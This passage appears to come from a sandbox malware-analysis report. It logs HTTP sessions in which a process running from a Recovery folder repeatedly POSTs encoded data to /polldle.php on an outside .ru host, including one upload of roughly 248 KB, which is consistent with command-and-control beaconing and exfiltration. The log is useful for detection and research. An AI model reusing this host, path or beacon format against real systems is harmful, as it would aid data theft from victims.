                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EWiFfE147FIztPPuY2PWVrF4B8qx1gqatGr9PJsfxiUXOofvzrYdlO4r6UTcyV6%2FZXyFzfTrJ78gcXGfztXUNZcPul%2BoxnBY78qg34XkPOp9bqTuqEqdHqfPCgJMKqRZiKzSPA4"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ddfae05ef9d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2490&min_rtt=2026&rtt_var=1688&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=254399&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:08.142602921 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                14 | 192.168.2.4 | 49796 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:08.371855974 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:08.723547935 CET | 2504 | OUT | Data Raw
                                                                                Jan 11, 2025 23:33:08.844157934 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:09.084268093 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSxSn3SO6oRaLIZHcXeGBfg6CYbXI2DVCP%2FGPQKH6wD96V%2FWU22wMAY7TVnW7FzR0gMIOX8r9sGJ7U79Uyet9YBmFFcvGdOoWNe3AY7BPB1c0mtn%2BhpwwYqMx8ofxrj8fYD8DGvz"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085de5fb338c47-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4575&min_rtt=1980&rtt_var=5933&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=64195&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                15 | 192.168.2.4 | 49803 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:09.246273041 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:09.598551989 CET | 1608 | OUT | Data Raw
                                                                                Jan 11, 2025 23:33:09.705621004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:09.944005966 CET | 964 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTi%2Fe0%2BR2HSb7Isy5nGx%2Fkj7H8f%2BGIc2Z4JxqujHvoKkglL%2B9E4EndzIB5Aiv0QHckWn1nyPu1yNFyel4uTGIHPbQ%2FlGF7xIURHkDXwMKikVfXu8AFQafO%2FDBwN2GM%2FxvWkpMGvu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085deb6fca7d11-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7909&min_rtt=1989&rtt_var=12586&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=29585&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                16 | 192.168.2.4 | 49804 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:09.263638973 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:09.614195108 CET | 2504 | OUT | Data Raw
                                                                                Jan 11, 2025 23:33:09.734811068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:09.908478022 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SYmTh8gpnFjTaLxetkLg16MWM1lBQjLuUuEQeIusKMzyiq56xq%2F0Hy9NxLkZd6IQ2AioVWs1CDQ8Phuf84l%2FcTwml5P62ORtBdpzI4%2BN1P3xvoOFVqGMhLsro%2BCJruREkW36vl1I"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085deb8bc9c40c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4086&min_rtt=1486&rtt_var=5757&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=65511&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                17 | 192.168.2.4 | 49809 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:10.095331907 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:10.442336082 CET | 2504 | OUT | Data Raw: 5d 5e 54 5e 5f 41 5a 5a 54 5d 55 5a 50 5b 59 5a 50 55 5a 52 57 5c 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^T^_AZZT]UZP[YZPUZRW\PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@.&@18223U4Z&;88(/<10-9$$52/X+#X'/\/
                                                                                Jan 11, 2025 23:33:10.541765928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:10.754272938 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:10.795636892 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=krQ5IchT1h2d0t67oJSsNKMTWudDjuIdeqHdUmFoMPVMgdln678b9n2ldAS20YjOqWJE9V1zCnL3sADZWwmVVgXvTKrYejdUT7vph7LNTWT8FLCSrHGaGMOGri5mDuYeRBq6zQ7V"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085df098529e1a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3152&min_rtt=1939&rtt_var=3154&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=125354&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                18 | 192.168.2.4 | 49816 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:11.092509985 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:11.442289114 CET | 2504 | OUT | Data Raw: 58 51 54 5f 5f 43 5a 5f 54 5d 55 5a 50 59 59 5f 50 57 5a 5a 57 52 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQT__CZ_T]UZPYY_PWZZWRPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B,0*&^,Z1*'?",=Y8)/R2.$$]!2 ?5#X'/\/0
                                                                                Jan 11, 2025 23:33:11.560729027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:11.812782049 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2F7lTxzOyhr1PZvxEqqaH6CZgGV6wI0o9Jvg702kakopkIraYK%2B6kUPMP0vZpp4SUZjTHeihFquu5HbRZetlCCQ6ByeEFjggZj%2FnmhDFFXBibbmFXDFgvc3G5v66OaZnhMTQ%2FANP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085df6fce85e7e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8308&min_rtt=1757&rtt_var=13761&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=26953&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                19 | 192.168.2.4 | 49823 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:12.005724907 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:12.379863024 CET | 2504 | OUT | Data Raw: 58 59 54 56 5f 45 5f 58 54 5d 55 5a 50 5a 59 58 50 5d 5a 52 57 51 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYTV_E_XT]UZPZYXP]ZRWQPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#92C%(($"$* Z9_/(/W1%-$6"X(5#X'/\/<
                                                                                Jan 11, 2025 23:33:12.447149992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:12.750646114 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRy8MXXX%2F5VCzd17uGFOQJq%2FnTT5tAgPshuew5NukJvBnNGwGzcGSydDP3v9LcZvzJbGjJ7Lu%2BZjhiAUE7BsOf3wVgLSBl7LKdvbVqyJ3lNKgg6lLf5VV8rf9HmQe1TZ4w00VyQT"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dfc89db0f88-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4347&min_rtt=1668&rtt_var=5983&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=63200&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:33:13.095062017 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRy8MXXX%2F5VCzd17uGFOQJq%2FnTT5tAgPshuew5NukJvBnNGwGzcGSydDP3v9LcZvzJbGjJ7Lu%2BZjhiAUE7BsOf3wVgLSBl7LKdvbVqyJ3lNKgg6lLf5VV8rf9HmQe1TZ4w00VyQT"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dfc89db0f88-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4347&min_rtt=1668&rtt_var=5983&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=63200&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                20 | 192.168.2.4 | 49830 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:13.095876932 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:13.444513083 CET | 2504 | OUT | Data Raw: 5d 5e 54 51 5a 40 5f 5b 54 5d 55 5a 50 5f 59 5d 50 55 5a 53 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TQZ@_[T]UZP_Y]PUZSWTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-0%1$]&!5'-R 6/;?+<7&&R-4(_63(%#X'/\/(
                                                                                Jan 11, 2025 23:33:13.548526049 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:13.762217045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:13.785037041 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWzhSQ%2B72o8Un0gjNoxjMNF%2BolC3Kp4kfIvERTJ9WaqIKwMGLnyXS%2BFrMqAqaTEYy5ns%2F5S3LpiR%2FrsKz02%2FKwiY5iSxV1L3SGw5Uin0O3v7tbjYaPP9Ej1wd9mJkN4jnVPKpzGG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e036ba632f4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3882&min_rtt=1913&rtt_var=4657&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=82616&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                21 | 192.168.2.4 | 49836 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:13.962224007 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                22 | 192.168.2.4 | 49837 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:14.246073008 CET | 321 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 247860
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:14.713777065 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:15.772346973 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZ9mnMIbfT6RqFcMdtsQOuh%2BQK6Zdw2JCAjEzg4nXU0WGBzr6oOubkdPrM75W%2FQoAj6Kk14Hm3IBL2cCoYd2laMyLY82fpQucdbEZ6YaJ6nJFFAPDcltvitCWOW2HdoPrcFNGpR1"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e0aadf35e7c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2210&min_rtt=1692&rtt_var=1670&sent=87&recv=258&lost=0&retrans=0&sent_bytes=25&recv_bytes=248181&delivery_rate=250171&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:33:15.772790909 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:15.871711016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:16.154567957 CET | 966 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pu5R2ka98Qj0QiwfmxdBlzvDs2pY8piaxvMwfC9sJa8XU%2Bq5qIsbHUexjVVZJLUXFB2jv3%2B4YJzksLbsRidX9p%2BKEppW9qm%2BwAEn4R8jUsy74ZbhC%2FuUgYYlB4WVAmF6Zm6SbA3V"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e11ef065e7c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7011&min_rtt=1610&rtt_var=10782&sent=93&recv=264&lost=0&retrans=0&sent_bytes=858&recv_bytes=250096&delivery_rate=1755862&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0a 24 0a 2f 00 28 3a 23 5e 39 28 2f 1f 2c 21 0e 12 2a 0f 08 5b 20 39 15 04 32 0b 3b 0a 3f 39 3e 19 2a 3a 05 1c 34 58 22 52 26 39 23 46 0c 1d 21 01 3e 59 27 0b 31 02 0a 1f 28 0d 3d 03 32 0c 05 1b 28 37 28 08 3d 2a 00 05 22 5a 22 52 2a 21 39 53 3d 36 3e 5d 2c 1f 2b 59 31 2a 2e 51 0f 16 21 1d 35 1f 23 01 37 2d 1e 01 26 30 33 11 3c 37 2c 13 31 03 38 53 3f 0d 22 12 3c 1c 2c 54 30 13 0d 1d 31 06 3a 5a 3e 3a 37 1b 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-$/(:#^9(/,!*[ 92;?9>*:4X"R&9#F!>Y'1(=2(7(=*"Z"R*!9S=6>],+Y1*.Q!5#7-&03<7,18S?"<,T01:Z>:7?;$\#(V?[M0
                                                                                Jan 11, 2025 23:33:16.498668909 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:16.597563982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:16.890289068 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2B5P0OBdix3yydRX37sq4UdWgBkuE1VINmeZiuJe66pRZFxtT1ux7ZhqX4DjE%2BXJuyf5bjFQDsp3jpiRdtesykoGTNMmLpqPz0qyE5ttkZKJmeE9YqSqwpGNwJ1xnQgMZ%2B5zQN2Q"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e167c6f5e7c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
